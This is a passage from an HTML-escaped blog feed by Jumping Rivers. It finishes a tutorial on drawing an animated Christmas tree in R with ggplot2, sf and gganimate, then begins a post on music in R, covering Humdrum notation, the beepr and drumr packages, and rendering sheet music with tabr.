&lt;li&gt;Add a star on the top:
&lt;code&gt;geom_point(aes(x = 0, y = 8), color = &amp;quot;gold&amp;quot;, shape = 8, size = 7, stroke = 3)&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Remove the axis with: &lt;code&gt;theme_void()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Set the border: &lt;code&gt;coord_sf(xlim = c(-6, 6), ylim = c(-4, 10))&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Add a Christmas message:
&lt;code&gt;annotate(&amp;quot;text&amp;quot;, x = 0, y = 9.5, label = &amp;quot;Merry Christmas \n From Jumping Rivers!&amp;quot;, size = 6)&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now our tree looks like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gg_tree &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_sf&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(), data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;tree, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;forestgreen&amp;#34;&lt;/span&gt;, color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;darkgreen&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_rect&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(xmin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-0.75&lt;/span&gt;, xmax &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.75&lt;/span&gt;, ymin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-2&lt;/span&gt;, ymax &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;saddlebrown&amp;#34;&lt;/span&gt;, color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sienna4&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;), color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;gold&amp;#34;&lt;/span&gt;, shape &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, stroke &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_void&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_sf&lt;/span&gt;(xlim &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;-6&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;), ylim &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;-4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;annotate&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;9.5&lt;/span&gt;, label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Merry Christmas \n From Jumping Rivers!&amp;#34;&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gg_tree
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="finished_tree.png" class="image-center" style="width: 450px;" alt = "Green Christmas tree made with the Ggplot2 R package."/&gt;
&lt;p&gt;Next we need to use {sf} again to make some lights for the tree then
{gganimate} to make the lights flash.&lt;/p&gt;
&lt;p&gt;Placing the points within the boundaries of the tree was a trickier task
than we expected until we fell upon &lt;code&gt;st_sample&lt;/code&gt; which we can pass a
polygon to and it’ll create some sample points within the boundaries. We
also create a vector to colour the points.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;points &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_sample&lt;/span&gt;(tree, &lt;span style="color:#a5d6ff"&gt;75&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;colours &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;red&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;yellow&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;blue&amp;#34;&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;75&lt;/span&gt;, replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gg_tree &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_sf&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(), data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;tree, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;forestgreen&amp;#34;&lt;/span&gt;, color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;darkgreen&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_sf&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(), data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;points, color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; colours) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_rect&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(xmin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-0.75&lt;/span&gt;, xmax &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.75&lt;/span&gt;, ymin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-2&lt;/span&gt;, ymax &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;saddlebrown&amp;#34;&lt;/span&gt;, color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sienna4&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;), color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;gold&amp;#34;&lt;/span&gt;, shape &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, stroke &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_void&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_sf&lt;/span&gt;(xlim &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;-6&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;), ylim &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;-4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;annotate&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;9.5&lt;/span&gt;, label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Merry Christmas \n From Jumping Rivers!&amp;#34;&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gg_tree
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="tree_lights.png" class="image-center" style="width: 450px;" alt = "Christmas tree with lights made with the sf and Ggplot2 R packages."/&gt;
&lt;p&gt;We can now animate it to make the lights sparkle using &lt;code&gt;transition_time&lt;/code&gt;
and &lt;code&gt;ease_aes&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gg_tree &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;transition_time&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;75&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ease_aes&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;linear&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="twinkling_christmas_tree.gif" class="image-center" style="width: 450px;" alt = "Final Christmas tree GIF with sparkling lights."/&gt;
&lt;p&gt;Lastly, have a great Christmas and New Year from the Jumping Rivers
team!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/christmas-tree/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Why would I use R for music?</title><link>https://www.jumpingrivers.com/blog/music-in-r/</link><pubDate>Thu, 19 Dec 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/music-in-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/music-in-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/music-in-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;With Christmas around the corner, and in the spirit of spreading some
joy out into the world, I decided not to write about shiny, or data
workflows, or developments in base R for a change. Rather, this post is
about something that brings me joy: music.&lt;/p&gt;
&lt;p&gt;Not that R doesn’t bring me joy. Hey, I’ve ‘done data’ in other
languages and in the point-and-click world. Solving the data problem
with R brings a very different kind of joy….&lt;/p&gt;
&lt;p&gt;As with most of my blogs, this one started with a daft project. I wanted
to make an app that printed out musical notation, with randomly-sampled
notes, that I could use as improvisation prompts when playing piano at
my local experimental music open mic. A problem we’ve all faced.&lt;/p&gt;
&lt;p&gt;This felt like something I could build in shiny, though it proved a
little more difficult than I expected. Solving the problem completely
might need a second blog post, a htmlwidget, and a bit of Javascript
knowledge.&lt;/p&gt;
&lt;p&gt;Here, we’ll talk about music in R, what packages are available, how to
represent musical notation, and what people are actually doing with
music data in R. We’ll maybe round off with a public domain Christmas
carol or two, for good measure.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-music-in-r"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="computer-world-musical-scores-sequencers-and-beeping-chips"&gt;Computer World: Musical scores, sequencers and beeping chips&lt;/h2&gt;
&lt;p&gt;Home computers have been making music since the 70’s. At a time when
dedicated sound chips belonged to a distant future, electromagnetic
interference from bit switches in an Altair was hacked to play “Fool on
the Hill” through a neighbouring radio (outlined in &lt;a href="https://global.oup.com/academic/product/bits-and-pieces-9780190496104?lang=en&amp;cc=gb" rel="external"&gt;“Bits and
Pieces”&lt;/a&gt;,
KB McAlpine, p154). Even earlier than this, people had made music on
research computers at universities (“Bits and Pieces”, p12). The
development, hand-in-hand, of electronic music, computer sound chips,
music software and video games is a fascinating story. But that’ll have
to wait for another day.&lt;/p&gt;
&lt;p&gt;Fundamental to those developments, was a simple question: how do you
represent a piece of music inside a computer? Converting this
representation into sound is a separate issue, because there are things
you can do with music beyond listening to it. You can compare different
aspects of a collection of songs (keys, harmonies, lyrics etc), you can
(attempt to) get a computer to &lt;a href="https://www.bbc.com/future/article/20140808-music-like-never-heard-before" rel="external"&gt;compose new
music&lt;/a&gt;,
or you can rearrange a given piece or print out sheet music for
musicians to play from. For example &lt;a href="https://kshaffer.github.io/2016/08/exploring-musical-data-with-R/" rel="external"&gt;here Kris
Shaffer&lt;/a&gt;
analyses chords in 100 rock songs using R, and here is a
&lt;a href="https://brunaw.com/shortcourses/IXSER/en/pres-en.html#1" rel="external"&gt;presentation&lt;/a&gt;
analysing chords, lyrics and spotify data by Bruna Wundervald and Julio
Trecenti using packages from the &lt;a href="https://github.com/r-music" rel="external"&gt;r-music&lt;/a&gt;
organization.&lt;/p&gt;
&lt;p&gt;Nowadays, most of the music stored on your computer will be stored as
recordings, such as mp3s. This wasn’t originally the case, early games
encoded music directly using note pitches and durations - much like you
find in sheet music. A modern view of this representation is provided by
the &lt;a href="https://www.humdrum.org/index.html" rel="external"&gt;Humdrum&lt;/a&gt; format. The following
contains the chorus melody for “Jingle Bells”.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;**kern
=1
4e
4e
2e
=2
4e
4e
2e
=3
4e
4g
4c
4d
=4
1e
=5
*-
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can view that melody in an &lt;a href="https://verovio.humdrum.org/" rel="external"&gt;online
tool&lt;/a&gt;, and we get traditional music
notation back out:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://www.jumpingrivers.com/blog/music-in-r/images/jingle.svg" alt="Musical score for the Jingle Bells chorus"
style="display: block; margin-left: auto; margin-right: auto;"&gt;&lt;/p&gt;
&lt;p&gt;The pairs “4g”, “2e”, “1e”, and so on, represent the duration (4, 2, 1
in increasing length; 4 being a crotchet or ‘quarter-note’) and pitch
(e, g). The “=1” lines separate bars, and the &lt;code&gt;&amp;quot;**kern&amp;quot;&lt;/code&gt; and &lt;code&gt;&amp;quot;*-&amp;quot;&lt;/code&gt;
delimit the whole sequence. To represent multiple notes playing at the
same time, you can use additional vertical tracks (spines) to represent
the additional notes. The syntax can get pretty
&lt;a href="https://www.humdrum.org/guide/ch06/" rel="external"&gt;complicated&lt;/a&gt; but so does sheet
music….&lt;/p&gt;
&lt;h2 id="solid-state-survivor-sounds-in-r---beepr-audio-tuner"&gt;Solid State “S”urvivor: Sounds in R - {beepr}, {audio}, {tuneR}&lt;/h2&gt;
&lt;p&gt;When it evolved from S in 1993, creating music might not have been on
the horizon for R.&lt;/p&gt;
&lt;p&gt;R wasn’t really on my horizon at the time either, I was at school, and
spent quite a bit of spare time writing music in
&lt;a href="https://en.wikipedia.org/wiki/OctaMED" rel="external"&gt;OctaMED&lt;/a&gt; on a Commodore Amiga -
again, involving multiple vertical tracks of pitches and durations.&lt;/p&gt;
&lt;p&gt;Can R even make a sound? Aside from the groans that
&lt;code&gt;Error in mean[1:3]: object of type 'closure' is not subsettable&lt;/code&gt; can evoke?&lt;/p&gt;
&lt;p&gt;Yes it can. There are a few packages available for producing sound in R.
My favourite is
&lt;a href="https://cran.r-project.org/web/packages/beepr/index.html" rel="external"&gt;{beepr}&lt;/a&gt;. If
you’ve got a long-running script burning away on your computer, what
better way to celebrate its completion than with a fanfare, or with the
Super Mario Bros “Level Complete” tune:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;source&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;my-beautiful-script.R&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;beepr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;beep&lt;/span&gt;(sound &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;mario&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Doodly-doodly-doo!&lt;/p&gt;
&lt;p&gt;You could similarly have a cymbal crash when you’ve finally loaded that
big dataset if you install
&lt;a href="https://cran.r-project.org/web/packages/drumr/" rel="external"&gt;{drumr}&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cars &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;); mtcars}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;drumr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;beat&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;crash&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We aren’t going to go any further into emitting sounds or analysing
music from R here. But there are a few packages like {audio} and {tuneR}
that can be used for this purpose.&lt;/p&gt;
&lt;h2 id="replicas-representing-music-and-making-sheet-music-in-r"&gt;Replicas: Representing music and making sheet music in R&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://leonawicz.github.io/tabr/" rel="external"&gt;{tabr}&lt;/a&gt; is a CRAN package providing
the ability to handle musical scores as data. It also provides the
ability to render sheet music from this data, by integrating with a
system dependency &lt;a href="https://lilypond.org/" rel="external"&gt;‘LilyPond’&lt;/a&gt;. Once you have
installed both LilyPond and {tabr}, you can construct sheet music from
R. The syntax for encoding melodies in tabr is similar but different
from that used in Humdrum, above.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tabr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;melody &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_music&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;e4 e e2 e4 e e2 e4 g c d e1&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_music&lt;/span&gt;(melody)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/music-in-r/images/tabrFirstJingle-1.png"&gt;
&lt;p&gt;So again, we encode notes with both pitch and duration, though now the
duration comes after the pitch (‘e4’ is a crotchet E). We don’t need to
specify the duration of a note, if it is the same as the preceding note.
{tabr} has added a time-signature and tempo using some default values.
This particular tempo might not help Santa get his sleigh off the ground
though - that’s about half the speed that Bing Crosby recorded it. The
notes are written out in a lower octave than in the Humdrum example,
too.&lt;/p&gt;
&lt;p&gt;We can fix all that though. While we’re at it let’s make that final run
a bit sassier:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;melody &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_music&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;e&amp;#39;4 e&amp;#39; e&amp;#39;2 e&amp;#39;4 e&amp;#39; e&amp;#39;2 e&amp;#39;4 g&amp;#39; c&amp;#39;~ c&amp;#39;8 d&amp;#39;8 e&amp;#39;1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tempo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;2 = 120&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_music&lt;/span&gt;(melody)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/music-in-r/images/tabrSecondJingle-1.png"&gt;
&lt;p&gt;You can find out the syntax used in the music strings using the
&lt;code&gt;tabrSyntax&lt;/code&gt; data-frame.&lt;/p&gt;
